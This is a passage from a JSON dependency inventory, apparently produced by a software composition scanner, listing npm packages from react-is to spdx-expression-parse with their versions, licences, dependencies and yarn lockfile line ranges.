"Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8883, "EndLine": 8886 } ], "AnalyzedBy": "yarn" }, { "ID": "react-is@19.2.4", "Name": "react-is", "Identifier": { "PURL": "pkg:npm/react-is@19.2.4", "UID": "36dffa4415a29c59" }, "Version": "19.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8888, "EndLine": 8891 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-animatable@1.4.0", "Name": "react-native-animatable", "Identifier": { "PURL": "pkg:npm/react-native-animatable@1.4.0", "UID": "9567a240de174a54" }, "Version": "1.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 8893, "EndLine": 8898 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-drawer-layout@4.1.13", "Name": "react-native-drawer-layout", "Identifier": { "PURL": "pkg:npm/react-native-drawer-layout@4.1.13", "UID": "e4cc849a2b05270e" }, "Version": "4.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "use-latest-callback@0.2.5" ], "Locations": [ { "StartLine": 8984, "EndLine": 8989 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-fit-image@1.5.5", "Name": "react-native-fit-image", "Identifier": { "PURL": "pkg:npm/react-native-fit-image@1.5.5", "UID": "8a5b2b558a357936" }, "Version": "1.5.5", "Licenses": [ "Beerware" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "prop-types@15.8.1" ], "Locations": [ { "StartLine": 9001, "EndLine": 9006 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-iphone-x-helper@1.3.1", "Name": "react-native-iphone-x-helper", "Identifier": { "PURL": "pkg:npm/react-native-iphone-x-helper@1.3.1", "UID": "a81846ff8c8fc97" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9079, "EndLine": 9082 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-is-edge-to-edge@1.3.1", "Name": "react-native-is-edge-to-edge", "Identifier": { "PURL": "pkg:npm/react-native-is-edge-to-edge@1.3.1", "UID": "dcda34bc3b0b123c" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9084, "EndLine": 9087 } ], "AnalyzedBy": "yarn" }, { "ID": "react-native-quick-base64@2.2.2", "Name": "react-native-quick-base64", "Identifier": { "PURL": "pkg:npm/react-native-quick-base64@2.2.2", "UID": "5285b07c55e6d94d" }, "Version": "2.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9203, "EndLine": 9206 } ], "AnalyzedBy": "yarn" }, { "ID": "react-refresh@0.14.2", "Name": "react-refresh", "Identifier": { "PURL": "pkg:npm/react-refresh@0.14.2", "UID": "87dab16e1be86a34" }, "Version": "0.14.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9436, "EndLine": 9439 } ], "AnalyzedBy": "yarn" }, { "ID": "read@4.1.0", "Name": "read", "Identifier": { "PURL": "pkg:npm/read@4.1.0", "UID": "98fede5716931a49" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mute-stream@2.0.0" ], "Locations": [ { "StartLine": 9476, "EndLine": 9479 } ], "AnalyzedBy": "yarn" }, { "ID": "read-cmd-shim@5.0.0", "Name": "read-cmd-shim", "Identifier": { "PURL": "pkg:npm/read-cmd-shim@5.0.0", "UID": "324673a16350e322" }, "Version": "5.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9454, "EndLine": 9455 } ], "AnalyzedBy": "yarn" }, { "ID": "read-pkg@5.2.0", "Name": "read-pkg", "Identifier": { "PURL": "pkg:npm/read-pkg@5.2.0", "UID": "673f1529e529b187" }, "Version": "5.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/normalize-package-data@2.4.4", "normalize-package-data@2.5.0", "parse-json@5.2.0", "type-fest@0.6.0" ], "Locations": [ { "StartLine": 9466, "EndLine": 9474 } ], "AnalyzedBy": "yarn" }, { "ID": "read-pkg-up@7.0.1", "Name": "read-pkg-up", "Identifier": { "PURL": "pkg:npm/read-pkg-up@7.0.1", "UID": "279e42704ede523" }, "Version": "7.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "find-up@4.1.0", "read-pkg@5.2.0", "type-fest@0.8.1" ], "Locations": [ { "StartLine": 9457, "EndLine": 9464 } ], "AnalyzedBy": "yarn" }, { "ID": "readable-stream@2.3.8", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@2.3.8", "UID": "ba01f38976b499f" }, "Version": "2.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "core-util-is@1.0.3", "inherits@2.0.4", "isarray@1.0.0", "process-nextick-args@2.0.1", "safe-buffer@5.1.2", "string_decoder@1.1.1", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 9481, "EndLine": 9492 } ], "AnalyzedBy": "yarn" }, { "ID": "readable-stream@3.6.2", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@3.6.2", "UID": "807dd25de15c63a9" }, "Version": "3.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 9494, "EndLine": 9501 } ], "AnalyzedBy": "yarn" }, { "ID": "readable-stream@4.7.0", "Name": "readable-stream", "Identifier": { "PURL": "pkg:npm/readable-stream@4.7.0", "UID": "f40ffa40de1a0829" }, "Version": "4.7.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "abort-controller@3.0.0", "buffer@6.0.3", "events@3.3.0", "process@0.11.10", "string_decoder@1.3.0" ], "Locations": [ { "StartLine": 9503, "EndLine": 9512 } ], "AnalyzedBy": "yarn" }, { "ID": "redent@3.0.0", "Name": "redent", "Identifier": { "PURL": "pkg:npm/redent@3.0.0", "UID": "9af2ff9c51627afb" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "indent-string@4.0.0", "strip-indent@3.0.0" ], "Locations": [ { "StartLine": 9514, "EndLine": 9520 } ], "AnalyzedBy": "yarn" }, { "ID": "regenerate@1.4.2", "Name": "regenerate", "Identifier": { "PURL": "pkg:npm/regenerate@1.4.2", "UID": "68db19ac664e287b" }, "Version": "1.4.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9548, "EndLine": 9551 } ], "AnalyzedBy": "yarn" }, { "ID": "regenerate-unicode-properties@10.2.2", "Name": "regenerate-unicode-properties", "Identifier": { "PURL": "pkg:npm/regenerate-unicode-properties@10.2.2", "UID": "bbe46c5b19fd960b" }, "Version": "10.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "regenerate@1.4.2" ], "Locations": [ { "StartLine": 9541, "EndLine": 9546 } ], "AnalyzedBy": "yarn" }, { "ID": "regenerator-runtime@0.13.11", "Name": "regenerator-runtime", "Identifier": { "PURL": "pkg:npm/regenerator-runtime@0.13.11", "UID": "43c696047f039d29" }, "Version": "0.13.11", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9553, "EndLine": 9556 } ], "AnalyzedBy": "yarn" }, { "ID": "regexpu-core@6.4.0", "Name": "regexpu-core", "Identifier": { "PURL": "pkg:npm/regexpu-core@6.4.0", "UID": "f7a333950f6a204e" }, "Version": "6.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "regenerate@1.4.2", "regenerate-unicode-properties@10.2.2", "regjsgen@0.8.0", "regjsparser@0.13.0", "unicode-match-property-ecmascript@2.0.0", "unicode-match-property-value-ecmascript@2.2.1" ], "Locations": [ { "StartLine": 9570, "EndLine": 9580 } ], "AnalyzedBy": "yarn" }, { "ID": "regjsgen@0.8.0", "Name": "regjsgen", "Identifier": { "PURL": "pkg:npm/regjsgen@0.8.0", "UID": "ed501d854aee866c" }, "Version": "0.8.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9582, "EndLine": 9585 } ], "AnalyzedBy": "yarn" }, { "ID": "regjsparser@0.13.0", "Name": "regjsparser", "Identifier": { "PURL": "pkg:npm/regjsparser@0.13.0", "UID": "bf1a7b21f4763bc1" }, "Version": "0.13.0", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "jsesc@3.1.0" ], "Locations": [ { "StartLine": 9587, "EndLine": 9592 } ], "AnalyzedBy": "yarn" }, { "ID": "require-directory@2.1.1", "Name": "require-directory", "Identifier": { "PURL": "pkg:npm/require-directory@2.1.1", "UID": "ff323ad4921b9829" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9594, "EndLine": 9597 } ], "AnalyzedBy": "yarn" }, { "ID": "require-resolve@0.0.2", "Name": "require-resolve", "Identifier": { "PURL": "pkg:npm/require-resolve@0.0.2", "UID": "58ffc80e15bc0b46" }, "Version": "0.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "x-path@0.0.2" ], "Locations": [ { "StartLine": 9604, "EndLine": 9609 } ], "AnalyzedBy": "yarn" }, { "ID": "reselect@4.1.8", "Name": "reselect", "Identifier": { "PURL": "pkg:npm/reselect@4.1.8", "UID": "1dfffa16058e9918" }, "Version": "4.1.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9611, "EndLine": 9614 } ], "AnalyzedBy": "yarn" }, { "ID": "resolve@1.22.10", "Name": "resolve", "Identifier": { "PURL": "pkg:npm/resolve@1.22.10", "UID": "ca4c0d95e889da74" }, "Version": "1.22.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-core-module@2.16.1", "path-parse@1.0.7", "supports-preserve-symlinks-flag@1.0.0" ], "Locations": [ { "StartLine": 9638, "EndLine": 9645 } ], "AnalyzedBy": "yarn" }, { "ID": "resolve-from@4.0.0", "Name": "resolve-from", "Identifier": { "PURL": "pkg:npm/resolve-from@4.0.0", "UID": "6f018ef1fcceb075" }, "Version": "4.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9623, "EndLine": 9626 } ], "AnalyzedBy": "yarn" }, { "ID": "resolve-from@5.0.0", "Name": "resolve-from", "Identifier": { "PURL": "pkg:npm/resolve-from@5.0.0", "UID": "82b438565eabef51" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9628, "EndLine": 9631 } ], "AnalyzedBy": "yarn" }, { "ID": "restore-cursor@3.1.0", "Name": "restore-cursor", "Identifier": { "PURL": "pkg:npm/restore-cursor@3.1.0", "UID": "8038ff2ef3550018" }, "Version": "3.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "onetime@5.1.2", "signal-exit@3.0.7" ], "Locations": [ { "StartLine": 9656, "EndLine": 9662 } ], "AnalyzedBy": "yarn" }, { "ID": "retry@0.12.0", "Name": "retry", "Identifier": { "PURL": "pkg:npm/retry@0.12.0", "UID": "6d670c056e7e4de" }, "Version": "0.12.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9664, "EndLine": 9667 } ], "AnalyzedBy": "yarn" }, { "ID": "reusify@1.1.0", "Name": "reusify", "Identifier": { "PURL": "pkg:npm/reusify@1.1.0", "UID": "6eec8961025e0938" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9669, "EndLine": 9672 } ], "AnalyzedBy": "yarn" }, { "ID": "rimraf@3.0.2", "Name": "rimraf", "Identifier": { "PURL": "pkg:npm/rimraf@3.0.2", "UID": "74d1d3dc65533efc" }, "Version": "3.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "glob@7.2.3" ], "Locations": [ { "StartLine": 9674, "EndLine": 9679 } ], "AnalyzedBy": "yarn" }, { "ID": "run-parallel@1.2.0", "Name": "run-parallel", "Identifier": { "PURL": "pkg:npm/run-parallel@1.2.0", "UID": "55809e0e83a59c84" }, "Version": "1.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "queue-microtask@1.2.3" ], "Locations": [ { "StartLine": 9681, "EndLine": 9686 } ], "AnalyzedBy": "yarn" }, { "ID": "safe-buffer@5.1.2", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.1.2", "UID": "9c7c3f5f8c0f1610" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9704, "EndLine": 9707 } ], "AnalyzedBy": "yarn" }, { "ID": "safe-buffer@5.2.1", "Name": "safe-buffer", "Identifier": { "PURL": "pkg:npm/safe-buffer@5.2.1", "UID": "2f4efd8b691a623f" }, "Version": "5.2.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9699, "EndLine": 9702 } ], "AnalyzedBy": "yarn" }, { "ID": "safe-regex-test@1.1.0", "Name": "safe-regex-test", "Identifier": { "PURL": "pkg:npm/safe-regex-test@1.1.0", "UID": "c69cb43e62960412" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "is-regex@1.2.1" ], "Locations": [ { "StartLine": 9717, "EndLine": 9724 } ], "AnalyzedBy": "yarn" }, { "ID": "safer-buffer@2.1.2", "Name": "safer-buffer", "Identifier": { "PURL": "pkg:npm/safer-buffer@2.1.2", "UID": "8019c86523a15740" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9726, "EndLine": 9729 } ], "AnalyzedBy": "yarn" }, { "ID": "sax@1.4.1", "Name": "sax", "Identifier": { "PURL": "pkg:npm/sax@1.4.1", "UID": "3bfafb66187c29ff" }, "Version": "1.4.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9731, "EndLine": 9734 } ], "AnalyzedBy": "yarn" }, { "ID": "scheduler@0.26.0", "Name": "scheduler", "Identifier": { "PURL": "pkg:npm/scheduler@0.26.0", "UID": "b1b3b7fc194636ec" }, "Version": "0.26.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9736, "EndLine": 9739 } ], "AnalyzedBy": "yarn" }, { "ID": "semver@5.7.2", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@5.7.2", "UID": "27157ab31a86c77" }, "Version": "5.7.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9781, "EndLine": 9784 } ], "AnalyzedBy": "yarn" }, { "ID": "semver@6.3.1", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@6.3.1", "UID": "232ca63dd14de8e5" }, "Version": "6.3.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9741, "EndLine": 9744 } ], "AnalyzedBy": "yarn" }, { "ID": "semver@7.7.3", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.3", "UID": "d601fc084200dd2d" }, "Version": "7.7.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9746, "EndLine": 9749 } ], "AnalyzedBy": "yarn" }, { "ID": "semver@7.7.4", "Name": "semver", "Identifier": { "PURL": "pkg:npm/semver@7.7.4", "UID": "9aad7ae20c731edd" }, "Version": "7.7.4", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9776, "EndLine": 9779 } ], "AnalyzedBy": "yarn" }, { "ID": "send@0.19.0", "Name": "send", "Identifier": { "PURL": "pkg:npm/send@0.19.0", "UID": "e8ffd79753025f1c" }, "Version": "0.19.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "encodeurl@1.0.2", "escape-html@1.0.3", "etag@1.8.1", "fresh@0.5.2", "http-errors@2.0.0", "mime@1.6.0", "ms@2.1.3", "on-finished@2.4.1", "range-parser@1.2.1", "statuses@2.0.1" ], "Locations": [ { "StartLine": 9786, "EndLine": 9803 } ], "AnalyzedBy": "yarn" }, { "ID": "serialize-error@2.1.0", "Name": "serialize-error", "Identifier": { "PURL": "pkg:npm/serialize-error@2.1.0", "UID": "b60932a30516a602" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9805, "EndLine": 9808 } ], "AnalyzedBy": "yarn" }, { "ID": "serve-static@1.16.2", "Name": "serve-static", "Identifier": { "PURL": "pkg:npm/serve-static@1.16.2", "UID": "4a73c954bc0da5c1" }, "Version": "1.16.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "encodeurl@2.0.0", "escape-html@1.0.3", "parseurl@1.3.3", "send@0.19.0" ], "Locations": [ { "StartLine": 9810, "EndLine": 9818 } ], "AnalyzedBy": "yarn" }, { "ID": "set-blocking@2.0.0", "Name": "set-blocking", "Identifier": { "PURL": "pkg:npm/set-blocking@2.0.0", "UID": "961988c295c2493a" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9820, "EndLine": 9823 } ], "AnalyzedBy": "yarn" }, { "ID": "set-function-length@1.2.2", "Name": "set-function-length", "Identifier": { "PURL": "pkg:npm/set-function-length@1.2.2", "UID": "73b3ffbd838f51f7" }, "Version": "1.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "define-data-property@1.1.4", "es-errors@1.3.0", "function-bind@1.1.2", "get-intrinsic@1.3.0", "gopd@1.2.0", "has-property-descriptors@1.0.2" ], "Locations": [ { "StartLine": 9825, "EndLine": 9835 } ], "AnalyzedBy": "yarn" }, { "ID": "setimmediate@1.0.5", "Name": "setimmediate", "Identifier": { "PURL": "pkg:npm/setimmediate@1.0.5", "UID": "2960beed2db80802" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9856, "EndLine": 9859 } ], "AnalyzedBy": "yarn" }, { "ID": "setprototypeof@1.2.0", "Name": "setprototypeof", "Identifier": { "PURL": "pkg:npm/setprototypeof@1.2.0", "UID": "8e9655c8ea3310a8" }, "Version": "1.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9861, "EndLine": 9864 } ], "AnalyzedBy": "yarn" }, { "ID": "sha1-file@1.0.4", "Name": "sha1-file", "Identifier": { "PURL": "pkg:npm/sha1-file@1.0.4", "UID": "4941109a58a3ef78" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9866, "EndLine": 9869 } ], "AnalyzedBy": "yarn" }, { "ID": "sharp@0.32.6", "Name": "sharp", "Identifier": { "PURL": "pkg:npm/sharp@0.32.6", "UID": "f58037ca37fa764e" }, "Version": "0.32.6", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color@4.2.3", "detect-libc@2.1.2", "node-addon-api@6.1.0", "prebuild-install@7.1.3", "semver@7.7.3", "simple-get@4.0.1", "tar-fs@3.1.1", "tunnel-agent@0.6.0" ], "Locations": [ { "StartLine": 9871, "EndLine": 9883 } ], "AnalyzedBy": "yarn" }, { "ID": "shebang-command@2.0.0", "Name": "shebang-command", "Identifier": { "PURL": "pkg:npm/shebang-command@2.0.0", "UID": "a6e96a85e53d4593" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "shebang-regex@3.0.0" ], "Locations": [ { "StartLine": 9885, "EndLine": 9890 } ], "AnalyzedBy": "yarn" }, { "ID": "shebang-regex@3.0.0", "Name": "shebang-regex", "Identifier": { "PURL": "pkg:npm/shebang-regex@3.0.0", "UID": "5cc0e0e704e37e12" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9892, "EndLine": 9895 } ], "AnalyzedBy": "yarn" }, { "ID": "shell-quote@1.8.3", "Name": "shell-quote", "Identifier": { "PURL": "pkg:npm/shell-quote@1.8.3", "UID": "a3a41973f080c785" }, "Version": "1.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9897, "EndLine": 9900 } ], "AnalyzedBy": "yarn" }, { "ID": "signal-exit@3.0.7", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@3.0.7", "UID": "29e40a3f2b692bce" }, "Version": "3.0.7", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9942, "EndLine": 9945 } ], "AnalyzedBy": "yarn" }, { "ID": "signal-exit@4.1.0", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@4.1.0", "UID": "6cfe89c675b09600" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9947, "EndLine": 9950 } ], "AnalyzedBy": "yarn" }, { "ID": "sigstore@4.0.0", "Name": "sigstore", "Identifier": { "PURL": "pkg:npm/sigstore@4.0.0", "UID": "9ef12f5c362beaf0" }, "Version": "4.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@sigstore/bundle@4.0.0", "@sigstore/core@3.0.0", "@sigstore/protobuf-specs@0.5.0", "@sigstore/sign@4.0.1", "@sigstore/tuf@4.0.0", "@sigstore/verify@3.0.0" ], "Locations": [ { "StartLine": 9952, "EndLine": 9960 } ], "AnalyzedBy": "yarn" }, { "ID": "simple-concat@1.0.1", "Name": "simple-concat", "Identifier": { "PURL": "pkg:npm/simple-concat@1.0.1", "UID": "5c21ead75d131a82" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9962, "EndLine": 9965 } ], "AnalyzedBy": "yarn" }, { "ID": "simple-get@4.0.1", "Name": "simple-get", "Identifier": { "PURL": "pkg:npm/simple-get@4.0.1", "UID": "990c12fcd5fb927e" }, "Version": "4.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "decompress-response@6.0.0", "once@1.4.0", "simple-concat@1.0.1" ], "Locations": [ { "StartLine": 9967, "EndLine": 9974 } ], "AnalyzedBy": "yarn" }, { "ID": "simple-plist@1.3.1", "Name": "simple-plist", "Identifier": { "PURL": "pkg:npm/simple-plist@1.3.1", "UID": "f13f2056c8f7b407" }, "Version": "1.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bplist-creator@0.1.0", "bplist-parser@0.3.1", "plist@3.1.0" ], "Locations": [ { "StartLine": 9976, "EndLine": 9983 } ], "AnalyzedBy": "yarn" }, { "ID": "simple-swizzle@0.2.4", "Name": "simple-swizzle", "Identifier": { "PURL": "pkg:npm/simple-swizzle@0.2.4", "UID": "8bb2c2be96a66d4d" }, "Version": "0.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.3.4" ], "Locations": [ { "StartLine": 9985, "EndLine": 9990 } ], "AnalyzedBy": "yarn" }, { "ID": "sisteransi@1.0.5", "Name": "sisteransi", "Identifier": { "PURL": "pkg:npm/sisteransi@1.0.5", "UID": "471971b14db12c3b" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9992, "EndLine": 9995 } ], "AnalyzedBy": "yarn" }, { "ID": "slash@3.0.0", "Name": "slash", "Identifier": { "PURL": "pkg:npm/slash@3.0.0", "UID": "d55ba69027e4876c" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10002, "EndLine": 10005 } ], "AnalyzedBy": "yarn" }, { "ID": "slugify@1.6.6", "Name": "slugify", "Identifier": { "PURL": "pkg:npm/slugify@1.6.6", "UID": "70e8a165aba3c45c" }, "Version": "1.6.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10016, "EndLine": 10019 } ], "AnalyzedBy": "yarn" }, { "ID": "smart-buffer@4.2.0", "Name": "smart-buffer", "Identifier": { "PURL": "pkg:npm/smart-buffer@4.2.0", "UID": "93ea596c76f58bc" }, "Version": "4.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10021, "EndLine": 10024 } ], "AnalyzedBy": "yarn" }, { "ID": "snake-case@3.0.4", "Name": "snake-case", "Identifier": { "PURL": "pkg:npm/snake-case@3.0.4", "UID": "6441b4a24ca1a713" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "dot-case@3.0.4", "tslib@2.8.1" ], "Locations": [ { "StartLine": 10026, "EndLine": 10032 } ], "AnalyzedBy": "yarn" }, { "ID": "socks@2.8.7", "Name": "socks", "Identifier": { "PURL": "pkg:npm/socks@2.8.7", "UID": "ceafdfb5c7a408cb" }, "Version": "2.8.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ip-address@10.0.1", "smart-buffer@4.2.0" ], "Locations": [ { "StartLine": 10060, "EndLine": 10066 } ], "AnalyzedBy": "yarn" }, { "ID": "socks-proxy-agent@8.0.5", "Name": "socks-proxy-agent", "Identifier": { "PURL": "pkg:npm/socks-proxy-agent@8.0.5", "UID": "b50f1db2d7ab66b1" }, "Version": "8.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "agent-base@7.1.4", "debug@4.4.3", "socks@2.8.7" ], "Locations": [ { "StartLine": 10043, "EndLine": 10050 } ], "AnalyzedBy": "yarn" }, { "ID": "source-map@0.5.6", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.5.6", "UID": "bec45af3e1f49929" }, "Version": "0.5.6", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10099, "EndLine": 10102 } ], "AnalyzedBy": "yarn" }, { "ID": "source-map@0.5.7", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.5.7", "UID": "10d1e440eebebc49" }, "Version": "0.5.7", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10089, "EndLine": 10092 } ], "AnalyzedBy": "yarn" }, { "ID": "source-map@0.6.1", "Name": "source-map", "Identifier": { "PURL": "pkg:npm/source-map@0.6.1", "UID": "ff8da986f19c07dd" }, "Version": "0.6.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10094, "EndLine": 10097 } ], "AnalyzedBy": "yarn" }, { "ID": "source-map-js@1.2.1", "Name": "source-map-js", "Identifier": { "PURL": "pkg:npm/source-map-js@1.2.1", "UID": "219c6c4823e8ff2a" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10068, "EndLine": 10071 } ], "AnalyzedBy": "yarn" }, { "ID": "source-map-support@0.5.21", "Name": "source-map-support", "Identifier": { "PURL": "pkg:npm/source-map-support@0.5.21", "UID": "7d37d41e2cebae09" }, "Version": "0.5.21", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-from@1.1.2", "source-map@0.6.1" ], "Locations": [ { "StartLine": 10073, "EndLine": 10079 } ], "AnalyzedBy": "yarn" }, { "ID": "spdx-correct@3.2.0", "Name": "spdx-correct", "Identifier": { "PURL": "pkg:npm/spdx-correct@3.2.0", "UID": "2ad2d2eaaffb873a" }, "Version": "3.2.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "spdx-expression-parse@3.0.1", "spdx-license-ids@3.0.22" ], "Locations": [ { "StartLine": 10104, "EndLine": 10110 } ], "AnalyzedBy": "yarn" }, { "ID": "spdx-exceptions@2.5.0", "Name": "spdx-exceptions", "Identifier": { "PURL": "pkg:npm/spdx-exceptions@2.5.0", "UID": "e93ea6a0c758cfcf" }, "Version": "2.5.0", "Licenses": [ "CC-BY-3.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10112, "EndLine": 10115 } ], "AnalyzedBy": "yarn" }, { "ID": "spdx-expression-parse@3.0.1", "Name": "spdx-expression-parse", "Identifier": { "PURL": 